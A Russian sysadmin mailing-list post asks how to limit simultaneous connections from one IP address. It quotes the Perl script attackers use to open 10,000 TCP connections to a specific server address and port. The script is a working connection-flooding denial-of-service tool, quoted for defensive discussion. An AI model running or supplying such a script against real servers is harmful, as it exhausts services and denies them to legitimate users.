На сервисы сервера,как станартные(апач)таки специфические ( самописные )
открывают по 10000 коннектов.
Злостные враги используют элементарные скрипты вроде
----------------------
#!/usr/bin/perl
use Socket;
$remote="195.248.173.111";
$port = 5003;
$i=10000;
for (1..$i) {
$iaddr = inet_aton($remote);
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK.$_, PF_INET, SOCK_STREAM, $proto);
connect(SOCK.$_, $paddr);
print "[$_]Connected\n";
};
----------------------
Вопрос: Чем можно ограничить число установленных подключений или попыток
установить подключение с одного IP адреса?
Где читать ? Как защищаться? iplimit из POMа не предлагать - нет возможности
пересобрать ядро.
iptables & limit тоже не подойдет.
_______________________________________________
Sysadmins mailing list
[email protected]
https://lists.altlinux.org/mailman/listinfo/sysadmins
